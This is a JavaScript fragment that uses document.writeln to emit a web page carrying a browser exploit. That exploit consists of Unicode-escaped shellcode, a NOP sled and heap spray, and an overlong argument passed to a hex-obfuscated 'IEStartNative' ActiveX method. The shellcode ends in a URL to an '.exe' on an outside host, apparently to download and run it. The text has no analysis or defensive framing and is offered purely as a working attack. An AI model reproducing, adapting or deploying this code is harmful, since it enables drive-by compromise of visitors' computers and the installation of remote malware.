document.writeln("\"%uc778%u0544%u652c%u0000%u5600%u8d56%u287d%uff57%u2075\" +"); document.writeln("\"%uff56%u2455%u5756%u55ff%ue80c%u0062%u0000%uc481%u0200\" +"); document.writeln("\"%u0000%u3361%uc2c0%u0004%u8b55%u51ec%u8b53%u087d%u5d8b\" +"); document.writeln("\"%u560c%u738b%u8b3c%u1e74%u0378%u56f3%u768b%u0320%u33f3\" +"); document.writeln("\"%u49c9%uad41%uc303%u3356%u0ff6%u10be%uf23a%u0874%ucec1\" +"); document.writeln("\"%u030d%u40f2%uf1eb%ufe3b%u755e%u5ae5%ueb8b%u5a8b%u0324\" +"); document.writeln("\"%u66dd%u0c8b%u8b4b%u1c5a%udd03%u048b%u038b%u5ec5%u595b\" +"); document.writeln("\"%uc25d%u0008%u92e9%u0000%u5e00%u80bf%u020c%ub900%u0100\" +"); document.writeln("\"%u0000%ua4f3%uec81%u0100%u0000%ufc8b%uc783%uc710%u6e07\" +"); document.writeln("\"%u6474%uc76c%u0447%u006c%u0000%uff57%u0455%u4589%uc724\" +"); document.writeln("\"%u5207%u6c74%uc741%u0447%u6c6c%u636f%u47c7%u6108%u6574\" +"); document.writeln("\"%uc748%u0c47%u6165%u0070%u5057%u55ff%u8b08%ub8f0%u0fe4\" +"); document.writeln("\"%u0002%u3089%u07c7%u736d%u6376%u47c7%u7204%u0074%u5700\" +"); document.writeln("\"%u55ff%u8b04%u3c48%u8c8b%u8008%u0000%u3900%u0834%u0474\" +"); document.writeln("\"%uf9e2%u12eb%u348d%u5508%u406a%u046a%uff56%u1055%u06c7\" +"); document.writeln("\"%u0c80%u0002%uc481%u0100%u0000%ue8c3%uff69%uffff%u048b\" +"); document.writeln("\"%u5324%u5251%u5756%uecb9%u020f%u8b00%u8519%u75db%u3350\" +"); document.writeln("\"%u33c9%u83db%u06e8%ub70f%u8118%ufffb%u0015%u7500%u833e\" +"); document.writeln("\"%u06e8%ub70f%u8118%ufffb%u0035%u7500%u8330%u02e8%ub70f\" +"); document.writeln("\"%u8318%u6afb%u2575%uc083%u8b04%ub830%u0fe0%u0002%u0068\" +"); document.writeln("\"%u0000%u6801%u1000%u0000%u006a%u10ff%u0689%u4489%u1824\" +"); document.writeln("\"%uecb9%u020f%uff00%u5f01%u5a5e%u5b59%ue4b8%u020f%uff00\" +"); document.writeln("\"%ue820%ufdda%uffff\" +"); document.writeln("\"%u7468%u7074%u2f3a%u772f%u7777%u622e%u6961%u7564%u6f75%u632e%u2f6e%u3231%u2f33%u6b6f%u652e%u6578\";"); document.writeln("var shellcode = unescape(cikeqq575562708);"); document.writeln("var nop = \"tmp9090tmp9090\";"); document.writeln("var Cike = unescape(nop.replace(\/tmp\/g,\"%u\"));"); document.writeln("while (Cike.length<224) Cike+=Cike;"); document.writeln("fillvcbcv = Cike.substring(0, 224);"); document.writeln("vcbcv = Cike.substring(0, Cike.length-224);"); document.writeln("while(vcbcv.length+224<0x40000) vcbcv = vcbcv+vcbcv+fillvcbcv;"); document.writeln("gdfgdh = new Array();"); document.writeln("for (x=0; x<300; x++) gdfgdh[x] = vcbcv +shellcode;"); document.writeln("var hellohack = \'\';"); document.writeln("while (hellohack.length < 600) hellohack+=\'\\x0a\\x0a\\x0a\\x0a\';"); document.writeln("target[\"\\x49\\x45\\x53\\x74\\x61\\x72\\x74\\x4e\\x61\\x74\\x69\\x76\\x65\"](hellohack,\"CikeVipWm\",\"fuckyou\");"); document.writeln("<\/script>"); document.writeln("<\/body>"); document.writeln("<\/html>"); document.writeln("") </script>